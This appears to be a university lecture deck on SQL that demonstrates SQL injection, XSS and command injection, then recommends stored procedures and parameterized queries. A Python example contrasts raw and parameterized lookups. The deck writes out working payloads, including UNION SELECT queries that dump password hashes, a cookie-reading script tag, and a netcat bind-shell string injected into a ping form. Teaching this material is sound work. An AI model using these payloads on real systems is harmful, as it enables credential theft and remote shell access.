That's some smart SQL!
Nick Tsamis, University of Tulsa, CS 7493, April 2013

Agenda
* What is SQL?
* Why SQL matters. *yawn*
* What's the big deal? What could possibly go wrong?
  * SQL Injection
  * XSS
  * Command Execution
* *pffft* So we shouldn't use SQL?

Structured Query Language
* Language: a specialized programming language, utilized in relational databases
* Query: raw data is queried to obtain information. "Our business is turning data into information." – Michael A. Peterson
* Structured: adheres to a strict, defined format (Query, Table, Column)

Relational Databases vs Hierarchical Databases
* Hierarchical: top-down flow only
* Relational: data relations are stored

Popularity
* One of the first commercial languages for relational models
* Today exists as the de facto standard (ANSI and ISO)
* It's EVERYWHERE

Versatility
* It's flexible: T-SQL, MySQL, LINQ

Vulnerabilities
* SQL is powerful... if you grant it
* Manages data, some of which is sensitive
* Provides a great entry point for access

Recovering a lost password: *yawn*
* Security is not always implicit
* Raw SQL can be very vulnerable to simple injections if $EMAIL = "anything' OR 'x'='x"

SQL Injection: injecting unintended code into a query
Returning user name from ID (source code shown on slide)
The attack
* We add a second condition that will always evaluate true (1=1)
* Purpose is to dump all user information
* $id = ' or 1=1 #
* Resulting clause: WHERE user_id = '' or 1=1 # '";

SQL Injection: returning SQL information
The attack(s)
* We add a union select to dump additional data
* $id = ' union SELECT 1, user() # (yields current SQL user)
* $id = ' and 1=1 union select database(),version() # (yields current SQL version and database name)

SQL Injection case study: returning the good stuff!!
The attack(s)
* We add a union select to dump password data
* $id = ' union select user, password FROM users # (yields current user and associated password hash)
XSS (Cross Site Scripting)
* Execute unintended scripts inline
* Throw an alert, passed as a URL argument
* What if we put an inline script in that URL? Alert box shown.
* Well that wasn't exactly l33t...
* Have a cookie: <script>alert(document.cookie)</script> Alert box shown.
* More serious implications:
  * Run a custom script that can open a remote connection (backdoor)
  * Read and dump configuration data (SQL or OS)

Command Execution: use the secret entrance
* A site that allows for free IP pinging (sample source shown on slide)
* Concatenating commands might work...
* 192.168.200.128;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 8999 > /tmp/pipe
* Attempts to allow connections on port 8999 with netcat (nc)
* Upon execution, browser waits for connection on port 8999

Better SQL: Stored Procedures
* Preformat and secure a static query
* Grant access to a SP, not the tables it accesses
* Typically increased performance
* Parameter check: data typing
* No network traffic: runs inside the engine

*pffft* Better SQL: String Filtering/Escaping
* String escape characters: ' " \ NUL
* No, we should use better SQL.

Mo' Better SQL: Parameterized SQL
* Strongly typed data is bound on execution
* Parameters are populated and checked
* User input is not directly embedded

*pffft* Database Management
* Permission limitation
* Principle of Least Privilege
* No, we should use better SQL.
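The raw, concatenated lookup beside its parameterized form, as an added example that is not part of the deck: it builds a constructed in-memory sqlite3 users table (the table layout and row values are assumptions) and runs the deck's password-recovery input anything' OR 'x'='x through both lookups.

```python
import sqlite3

# Constructed sample rows (assumption: a minimal users table for the demo).
SAMPLE_USERS = [
    (1, "alice", "alice@example.com", "hash-a"),
    (2, "bob", "bob@example.com", "hash-b"),
    (3, "carol", "carol@example.com", "hash-c"),
]


def setup_db():
    """Create an in-memory database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, username TEXT, email TEXT, pw_hash TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_raw(conn, email):
    """Raw SQL: the input is embedded directly in the query text."""
    sql = "SELECT username FROM users WHERE email = '" + email + "'"
    return sorted(row[0] for row in conn.execute(sql))


def lookup_parameterized(conn, email):
    """Parameterized SQL: the input is bound as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE email = ?"
    return sorted(row[0] for row in conn.execute(sql, (email,)))


def demo():
    """Run the deck's $EMAIL input through both lookups and a legitimate lookup."""
    conn = setup_db()
    injected = "anything' OR 'x'='x"  # the $EMAIL value from the deck
    return {
        "raw": lookup_raw(conn, injected),                      # every username
        "parameterized": lookup_parameterized(conn, injected),  # no match
        "legit": lookup_parameterized(conn, "bob@example.com"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

SQLite comments start with --, not MySQL's #, so the deck's union-select payloads are not reproduced here; the OR 'x'='x input is enough to show the difference between the two lookups.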